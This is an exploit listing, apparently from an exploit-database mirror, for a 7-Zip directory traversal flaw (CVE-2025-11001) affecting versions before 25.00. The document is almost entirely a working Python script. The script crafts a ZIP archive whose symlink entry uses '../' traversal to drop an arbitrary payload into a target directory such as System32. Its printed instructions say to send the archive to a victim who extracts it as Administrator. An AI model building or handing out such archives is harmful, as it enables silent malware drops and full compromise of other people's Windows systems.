Share
## https://sploitus.com/exploit?id=PACKETSTORM:218666
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP 
    # Date: 2025-11-22
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.7-zip.org
    # Software Link: https://www.7-zip.org/download.html
    # Version: 7-Zip < 25.00
    # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
    # CVE: CVE-2025-11001
    # CVSS: 8.8 (High) - draft estimation
    # Category: Local Privilege Escalation / Remote Code Execution
    # Platform: Windows
    # CRITICAL: Yes - Public exploit available, active exploitation reported
    # Including: Directory Traversal via crafted symlink entry in ZIP archive
    # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
    # Fix: Upgrade to 7-Zip 25.00 or later
    # Advisory: https://www.7-zip.org/history.txt
    # Patch: https://github.com/ip7z/7zip/releases/tag/25.00
    # Target: Windows systems running vulnerable 7-Zip versions
    
    import struct
    import os
    import argparse
    import sys
    
    def build_zip(target_path, payload_file, output_zip):
        if not os.path.isfile(payload_file):
            print(f"[-] Payload file not found: {payload_file}")
            sys.exit(1)
    
        payload_name = os.path.basename(payload_file)
        payload_data = open(payload_file, "rb").read()
    
        target = target_path.replace("\\", "/").strip("/") + "/"
        traversal = "../../../../" + target
    
        with open(output_zip, "wb") as f:
            offset = 0
    
            symlink_name = "evil.lnk"
            symlink_target = traversal.encode() + b"\x00"
            symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
    
            symlink_header = struct.pack("<IHHHHHHIIIHH",
                0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
                0, 0, 0,
                len(symlink_name), len(symlink_extra))
    
            f.write(symlink_header)
            f.write(symlink_name.encode())
            f.write(symlink_extra)
            f.write(b"")
            symlink_central_offset = offset
            offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
    
            payload_header = struct.pack("<IHHHHHHIIIHH",
                0x04034b50, 20, 0x800, 0, 0, 0,
                0, len(payload_data), len(payload_data),
                len(payload_name), 0)
    
            f.write(payload_header)
            f.write(payload_name.encode())
            f.write(payload_data)
            payload_central_offset = offset
            offset += len(payload_header) + len(payload_name) + len(payload_data)
    
            cd_offset = offset
    
            f.write(struct.pack("<IHHHHHHIIIHHHHHII",
                0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
                0, 0, 0,
                len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
            f.write(symlink_name.encode())
            f.write(symlink_extra)
    
            f.write(struct.pack("<IHHHHHHIIIHHHHHII",
                0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
                0, len(payload_data), len(payload_data),
                len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
            f.write(payload_name.encode())
    
            f.write(struct.pack("<IHHHHIIH",
                0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
    
        print(f"[+] Malicious archive created: {output_zip}")
        print(f"[+] Target path          : {target_path}")
        print(f"[+] Payload file         : {payload_name} ({len(payload_data)} bytes)")
        print(f"[+] Final write location : {target_path}\\{payload_name}")
        print("\n[*] Usage:")
        print("    1. Send the ZIP file to the victim")
        print("    2. Victim must run 7-Zip < 25.00 as Administrator")
        print("    3. Victim opens and extracts the ZIP โ†’ payload dropped silently")
        print("    4. Achievement unlocked")
    
    if __name__ == "__main__":
        banner = """
        CVE-2025-11001 - 7-Zip Directory Traversal PoC
        Author: Mohammed Idrees Banyamer (@banyamer_security)
        """
        print(banner)
    
        parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
        parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
        parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
        parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
    
        args = parser.parse_args()
    
        build_zip(args.target, args.payload, args.output)